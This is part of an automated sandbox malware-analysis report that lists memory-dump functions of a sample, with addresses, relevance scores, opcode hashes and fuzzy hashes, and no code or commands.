                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0bd4c10ab0b95eb456bf9d66eea9d212b06191e766ad4f73f1a40da710ebec06
                                          • Instruction ID: 3aff25ac63f2c3cf40aa47ca0d2602ca53bd4870fb81be79d32ba48e27e09547
                                          • Opcode Fuzzy Hash: 0bd4c10ab0b95eb456bf9d66eea9d212b06191e766ad4f73f1a40da710ebec06
                                          • Instruction Fuzzy Hash: 98412170E1994D9FDFA8EB98D4A1ABD7BB1FF58300F11047DD00AE72A5DA35AA41CB40
                                          Function 00007FFD9B9EA748 Relevance: .1, Instructions: 100COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 96908750a3369b0d6b3b77e50534f6e304941a64610a7be6b666b11c913d8259
                                          • Instruction ID: bd63754148e3c042960125cc95434cf074869846ca07e0dd8cf89933b898cc30
                                          • Opcode Fuzzy Hash: 96908750a3369b0d6b3b77e50534f6e304941a64610a7be6b666b11c913d8259
                                          • Instruction Fuzzy Hash: 8B31D431B2990E5FDB54DB9CD4A19A8B7A1FF85310B51827DD04ED72A2CB25BE128780
                                          Function 00007FFD9B9E6F15 Relevance: .1, Instructions: 99COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d4483db3ab325406932d21ba7b47b4c9d599a7f12a2d8c57a9831f5b5012f5b
                                          • Instruction ID: 357f0a38f24a898b79ed10b7c716919ff722336a2ab014f3bb0b831816cf3078
                                          • Opcode Fuzzy Hash: 0d4483db3ab325406932d21ba7b47b4c9d599a7f12a2d8c57a9831f5b5012f5b
                                          • Instruction Fuzzy Hash: 06311C30A2E54EEFEB68DB9484655BD7BB1FF44300F61057AD01EDA1A1DE38BB409741
                                          Function 00007FFD9B9EA7DA Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 75be8c1441fc7aa1656d6333c94a3b8d00cf09981860e11631b22858b86dca7f
                                          • Instruction ID: 24113774202a83090c0a62d9c2c254c719fe0290074b920cfb202f65221bd93e
                                          • Opcode Fuzzy Hash: 75be8c1441fc7aa1656d6333c94a3b8d00cf09981860e11631b22858b86dca7f
                                          • Instruction Fuzzy Hash: 93210871B2DA8E5FE768D7A894726A877D1FF84310F550279D05EC71A3EE146A06C380
                                          Function 00007FFD9B9E42CD Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c5d3544860ecdf1879b80e88473bcdf27f74d6c86074e48ab1fae3769c567798
                                          • Instruction ID: af53ae66ba01c1f9a71ebe888c87974ca0b2e46b0696307f29fcf5d15ec469ef
                                          • Opcode Fuzzy Hash: c5d3544860ecdf1879b80e88473bcdf27f74d6c86074e48ab1fae3769c567798
                                          • Instruction Fuzzy Hash: E9219531B2981E9BDB58DA9CD461AACB7A1FF84354B518279D40DD7392CF24BA12C780
                                          Function 00007FFD9B9EC2A0 Relevance: .1, Instructions: 94COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 28ae219660222755d665ad4a957541e62b1b45795e30f8f4086ca26c17f864da
                                          • Instruction ID: f9c02cc6412a75a83845085f30b2673b1d059a4c2dc52e62368ab98971f31fd1
                                          • Opcode Fuzzy Hash: 28ae219660222755d665ad4a957541e62b1b45795e30f8f4086ca26c17f864da
                                          • Instruction Fuzzy Hash: 5A312711A2E6DA6BE73AD2684870574BF71EF9230071946FAC0D68F5E7C81CBA818741
                                          Function 00007FFD9B9E436E Relevance: .1, Instructions: 90COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dce84732106af0b813ab68036476406bd8493e0c3e66b0fab3afa02ed26a078f
                                          • Instruction ID: 1940b10ab7a8ac1a06241b44c6b23c98c9281f8b277cc557c038a378dae7961d
                                          • Opcode Fuzzy Hash: dce84732106af0b813ab68036476406bd8493e0c3e66b0fab3afa02ed26a078f
                                          • Instruction Fuzzy Hash: 0B21F221F2E54D5BE764A7A898723EC7BE0FF45310F46017DD05DC32E3DD186A458240
                                          Function 00007FFD9B9E7FE8 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c2bedf836200b3df980a65aca1bd2cf3248ab01b3459423aa84930ff8665a79
                                          • Instruction ID: afb28c3115d91321520ff7ca2d0abe07d19eb92eeeeb6aae35bf8e52b12c6a0c
                                          • Opcode Fuzzy Hash: 7c2bedf836200b3df980a65aca1bd2cf3248ab01b3459423aa84930ff8665a79
                                          • Instruction Fuzzy Hash: 06313870A2D94EEEEBB8EB9484A05BD77B1FF64300F51007AD01ED61E1EA387B409A51
                                          Function 00007FFD9B9E3232 Relevance: .1, Instructions: 84COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dc1ed01292ccc248d871525f7ff6c0db14f88317d416393d773ffaaf53e00f44
                                          • Instruction ID: 3edfa35ab149b6660087648baf51b6a81c60a4e6e20008838f661898b6c43101
                                          • Opcode Fuzzy Hash: dc1ed01292ccc248d871525f7ff6c0db14f88317d416393d773ffaaf53e00f44
                                          • Instruction Fuzzy Hash: 1C312A30A1991D9FDFADDB68C465AECB7B1FF58300F0141ADD04EE72A1CE35AA408B40
                                          Function 00007FFD9B9E994B Relevance: .1, Instructions: 81COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 882b8aec6db31d8f9661c2542f8d8fb5783baa5793049fa6488a594414506c9e
                                          • Instruction ID: e7049354164d277d8629ef7ace16dccffaf2a6d5c7bbeefc265a3ea8a69a23aa
                                          • Opcode Fuzzy Hash: 882b8aec6db31d8f9661c2542f8d8fb5783baa5793049fa6488a594414506c9e
                                          • Instruction Fuzzy Hash: F521F73191D6CC9FCBA6DBA4C864AE87BF0EF56300F1500EAD00DCB1A2DA395B85CB51
                                          Function 00007FFD9B9E994A Relevance: .1, Instructions: 80COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4195b6cd9a51c738dc73c2910ff3d2dcb9eb66e49b06e67071a803543f4afdd
                                          • Instruction ID: 9c7f6a8f39a295360bd1ee447689c64971cd858bf4d4852995b6a8701b4bce5d
                                          • Opcode Fuzzy Hash: a4195b6cd9a51c738dc73c2910ff3d2dcb9eb66e49b06e67071a803543f4afdd
                                          • Instruction Fuzzy Hash: 9821E73191D68C9FCB65DFA4C864AD87BF0EF56300F1500EAD40DD71A2DA395A85CB51
                                          Function 00007FFD9B9E938A Relevance: .1, Instructions: 73COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 078ebe014d0f0dba9827c1faa323231a1cee95677697d4aaa050dd93face08f2
                                          • Instruction ID: dd0cafed15bfc7b5225ac3575bca875a093f233c44744ab4bb396aca25bd521e
                                          • Opcode Fuzzy Hash: 078ebe014d0f0dba9827c1faa323231a1cee95677697d4aaa050dd93face08f2
                                          • Instruction Fuzzy Hash: 1421C511A2F2DAABF33693B8147857C3F506F86614F1A01FAD45D890E3EC6C27459363
                                          Function 00007FFD9B9E96C9 Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 503b9b11c03d405b7d04adb5f0fdd2143f9a7f6c27211b4345422a8f003855da
                                          • Instruction ID: aa8012b1b60fef0c981bd999778e459458a060523f3a6bddd2f2011ba8add868
                                          • Opcode Fuzzy Hash: 503b9b11c03d405b7d04adb5f0fdd2143f9a7f6c27211b4345422a8f003855da
                                          • Instruction Fuzzy Hash: CE210E71E1991D9FDF9CDB58C4A5AADB7A1EF58310F0140BED00EE72A5CE356A418B40
                                          Function 00007FFD9B9E5E28 Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3debfcb76135a9988b56bc177bab1092d1b65a0b1c953722d3398ab79766a76f
                                          • Instruction ID: dccad26fb4e78cd3968b838550a60fc7dd0e5cd204f9d51c9528cb270e1c7400
                                          • Opcode Fuzzy Hash: 3debfcb76135a9988b56bc177bab1092d1b65a0b1c953722d3398ab79766a76f
                                          • Instruction Fuzzy Hash: 2E21C930A3E46EB6F678D25884B55787B51FF90301B16867DD05B8F5AACC1CBBC19280
                                          Function 00007FFD9B9E41D9 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3432c7c4223be9af3799f0a7ff986471bc56901e7d96e62372fa0ae8145996bf
                                          • Instruction ID: 7c0250266804378b4734ba9d21c476650ac2f3e410c278bde4c6d446a5a528c5
                                          • Opcode Fuzzy Hash: 3432c7c4223be9af3799f0a7ff986471bc56901e7d96e62372fa0ae8145996bf
                                          • Instruction Fuzzy Hash: 4E113831B1F68E6FE770D5E458742AD3BE5DF56350F0601BAD04DD72A2DE182B4183A1
                                          Function 00007FFD9B9FCF28 Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 629b5e96e1e4851d34683bbdc3f8e8347ac4d93b32ff0d3ff2b4413783d095d6
                                          • Instruction ID: 49f4ada0279b6f2f3e762b57aa7cf4d6d216a9c25d788e2e86e408e2b43d95d9
                                          • Opcode Fuzzy Hash: 629b5e96e1e4851d34683bbdc3f8e8347ac4d93b32ff0d3ff2b4413783d095d6
                                          • Instruction Fuzzy Hash: 5C21C910E2D76F56F6389F8484B49B47251FB96301F154577D0CB8B5AAC96CBEC1D280
                                          Function 00007FFD9B9E96EF Relevance: .1, Instructions: 58COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ab00041e1bf90898d1034d85ad998f9330a411e50437feaa1c0dc2abab8f7905
                                          • Instruction ID: 89e0721b9a95b968d76eecca545df6f618446572a3a2163ca328b9b5592c2b2c
                                          • Opcode Fuzzy Hash: ab00041e1bf90898d1034d85ad998f9330a411e50437feaa1c0dc2abab8f7905
                                          • Instruction Fuzzy Hash: 4A112B30A1991D9FDF9CDB58C465AEDB7B1EF58310F4100BED00EE72A5CE75AA418B00
                                          Function 00007FFD9B9E4D2E Relevance: .1, Instructions: 58COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 79a1ff0f70f8bc296ba785c74c3f8b7f5795b56f2be18bc5c412e14b9fcc4477
                                          • Instruction ID: b9c819f9776f262b2072fc1608cf199a827a5dc938d6c6843f45b462619dfea5
                                          • Opcode Fuzzy Hash: 79a1ff0f70f8bc296ba785c74c3f8b7f5795b56f2be18bc5c412e14b9fcc4477
                                          • Instruction Fuzzy Hash: 7E012B3135950D8BE715CB9CF4A87E97B80FB55364F65013ED909C32D1CB25AAA08780
                                          Function 00007FFD9B9E7E40 Relevance: .1, Instructions: 53COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e028fcb1bf38161dc3c6cd67e8413cdb8aa5ec251f363e92209c9c4a79460313
                                          • Instruction ID: c65cfb5546a5c7d9dd4a56c7047638d9d003fed23fb409f1b264916ca76d11b4
                                          • Opcode Fuzzy Hash: e028fcb1bf38161dc3c6cd67e8413cdb8aa5ec251f363e92209c9c4a79460313
                                          • Instruction Fuzzy Hash: 12015E21F3F17FA6F678A6EC24395BD53006F98710F561576D40E861E6EC6C3B4122A3
                                          Function 00007FFD9B9E3542 Relevance: .0, Instructions: 39COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 504679ebed6ab5f91f61f868df50294c0b8d102047b9bf73520bfbdff1b822dd
                                          • Instruction ID: fc4fc4985f94d55aaa0ba1f4c1a319d3bc62a1ca6e62e9b40a6b6fb26dddd309
                                          • Opcode Fuzzy Hash: 504679ebed6ab5f91f61f868df50294c0b8d102047b9bf73520bfbdff1b822dd
                                          • Instruction Fuzzy Hash: 33F0623185F2C9BFD7139BB0C8215A97FB4BF43214F1A01FAE089861A2C96C6746C751
                                          Function 00007FFD9B9E30E7 Relevance: .0, Instructions: 36COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 68804d6747b7a08e0736312fddf40391ad644a5d336814a986bb4dd5b824b928
                                          • Instruction ID: 08fabb7294a8b8f28784ebef16adf7f27bdbb8525eb60bb690682508ccd1114f
                                          • Opcode Fuzzy Hash: 68804d6747b7a08e0736312fddf40391ad644a5d336814a986bb4dd5b824b928
                                          • Instruction Fuzzy Hash: 8B01FB70A1895DDFDF59EB58C4A0AACB7B2FB68300F1001ADD00EE32A1DA34A940CF40
                                          Function 00007FFD9B9E4D08 Relevance: .0, Instructions: 34COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 765aae279a34691659c96a6f9f2c4c1d38145db0b38dce040f41b6a242ce0c7b
                                          • Instruction ID: 446cde38ade71e2c631d2f0303154f956aa03ee03ee3b6b57d4a7d995adb20c2
                                          • Opcode Fuzzy Hash: 765aae279a34691659c96a6f9f2c4c1d38145db0b38dce040f41b6a242ce0c7b
                                          • Instruction Fuzzy Hash: 5CF08221B7E90EAAF7358594A4713FD2B44AF45355F72053EC80E872E2C91937915291
                                          Function 00007FFD9B9E4237 Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5f13d1623f19171ac82d61807291775ee0189a1d2fbbe0f89eea58eb5cf95000
                                          • Instruction ID: 876c70cc9357bbf0e86f678e08ec356d3839935c91cbba773e07c653ce57df41
                                          • Opcode Fuzzy Hash: 5f13d1623f19171ac82d61807291775ee0189a1d2fbbe0f89eea58eb5cf95000
                                          • Instruction Fuzzy Hash: 04D05E82F1F38A6BEB7A19B4087126C0B808F1734475B06BAD15E8E3F3E9986B045361
                                          Function 00007FFD9B9EB1AB Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 878f212b8703f5372aab83c028bace369bc9556b354df56c6826f3026d9a9e76
                                          • Instruction ID: 6e520f19e28664d54a270ef46cc595110b158898e3fd40c7a73f83bfeb85017c
                                          • Opcode Fuzzy Hash: 878f212b8703f5372aab83c028bace369bc9556b354df56c6826f3026d9a9e76
                                          • Instruction Fuzzy Hash: 16D09210B2F51BA6F23956C191F133A73905F01711E62943AE09F519E1C9187B016A12
                                          Function 00007FFD9B9EA6CC Relevance: .0, Instructions: 8COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1264ca26859d28ad799321bcaaa42a504598ed0666a5a1b85225acf7fcd285f6
                                          • Instruction ID: c0bdac9e714e637ba834d92cbfefc0d6b57ab77c8803eb480381c0604510dd98
                                          • Opcode Fuzzy Hash: 1264ca26859d28ad799321bcaaa42a504598ed0666a5a1b85225acf7fcd285f6
                                          • Instruction Fuzzy Hash: CBC04C40F1E34FAAE63211F4487003906454F16600B1646769147991F3D9486F056255

                                          Non-executed Functions

                                          Function 00007FFD9B9E1048 Relevance: 6.9, Strings: 5, Instructions: 666COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 1._I$2._I$3._I$4._I$5._I
                                          • API String ID: 0-1004045599
                                          • Opcode ID: 5fdc2dd932e3bcd65465faa4e256a11e4548d5dea69360ea055926c266845d26
                                          • Instruction ID: 4f722779362a90ecad0b276073aea321250985ad5b1e32f49971a13f276b1a7e
                                          • Opcode Fuzzy Hash: 5fdc2dd932e3bcd65465faa4e256a11e4548d5dea69360ea055926c266845d26
                                          • Instruction Fuzzy Hash: C52218A3A0F7D52FEB3646AC28251696FD1EF5265471A41FBE0D84B1FBF804AF058341
                                          Function 00007FFD9B9E1128 Relevance: 5.4, Strings: 4, Instructions: 417COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2._I$3._I$4._I$5._I
                                          • API String ID: 0-149181049
                                          • Opcode ID: 7442984b7e02087410f469df0ce0809f05862dce2739bf89cd7f34334f7f1634
                                          • Instruction ID: 6012dae321c0aaff6ffc18124d2c3603ae3dc69041d8ec24a0903e63c360f61e
                                          • Opcode Fuzzy Hash: 7442984b7e02087410f469df0ce0809f05862dce2739bf89cd7f34334f7f1634
                                          • Instruction Fuzzy Hash: 5DD1F5A3A0F7D52FEB3646AC28241752FD1AF9266471A40FBF0D84B1FBB814AF458341
                                          Function 00007FFD9B7FDDAD Relevance: .2, Instructions: 245COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1746692011.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b7f0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9795bb918361d54fbddff9ff2e19c320f91758e58c58c452a8d2c3016610be1e
                                          • Instruction ID: a5d304c7de68200860bc9dc14ab06ec8ea6bf872cd318fa5fdaf8efe60b8421e
                                          • Opcode Fuzzy Hash: 9795bb918361d54fbddff9ff2e19c320f91758e58c58c452a8d2c3016610be1e
                                          • Instruction Fuzzy Hash: E0819430A08A8D8FDBA8DF18C855BE97BE1FF59310F10422EE84DC7291DB74A945CB81
                                          Function 00007FFD9B9E0DC0 Relevance: 6.3, Strings: 5, Instructions: 94COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 1._I$2._I$3._I$4._I$5._I
                                          • API String ID: 0-1004045599
                                          • Opcode ID: c0beef20fd1a0624c5d4d1981fa564c600ca93c3aab2b5f9339e845c2b0c7a1b
                                          • Instruction ID: c94caddcf78be88854bdaeee305db0650d877610b12055c95a5f6d76f653918e
                                          • Opcode Fuzzy Hash: c0beef20fd1a0624c5d4d1981fa564c600ca93c3aab2b5f9339e845c2b0c7a1b
                                          • Instruction Fuzzy Hash: 5521C8E3A1F6C42FE7350AAC7C261286FD1AB91A6071901FFE0D8470FB9855AF468341
                                          Function 00007FFD9B9E04BA Relevance: 5.4, Strings: 4, Instructions: 449COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ._^$<._^$>._^$?._^
                                          • API String ID: 0-1502700031
                                          • Opcode ID: c0bd5491e08dc05a09ff12d3cff8b68409f913f1108c58ef796e2338dd54e5fc
                                          • Instruction ID: 155bfee0f767c6ee6f3be66a90768f26bdfc273ece75b0846445178f4e2bd490
                                          • Opcode Fuzzy Hash: c0bd5491e08dc05a09ff12d3cff8b68409f913f1108c58ef796e2338dd54e5fc
                                          • Instruction Fuzzy Hash: 2CD19B17E0F1E62BD311F76DA8BA4E93F609F8166D71982F3E09C4D0D3DD0C66498295
                                          Function 00007FFD9B9E86F2 Relevance: 5.1, Strings: 4, Instructions: 103COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1748536176.00007FFD9B9E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ffd9b9e0000_lfcdgbuksf.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: -_^$-_^$-_^$-_^
                                          • API String ID: 0-2193834339
                                          • Opcode ID: 43ded0fca502d737e3e16fec4e8be00ab35b870018a17a018b0051f1e06cb4b8
                                          • Instruction ID: 78bf8933f6714ea4e73ea6821496bb48383592e213d2714657b0ffad76988595
                                          • Opcode Fuzzy Hash: 43ded0fca502d737e3e16fec4e8be00ab35b870018a17a018b0051f1e06cb4b8
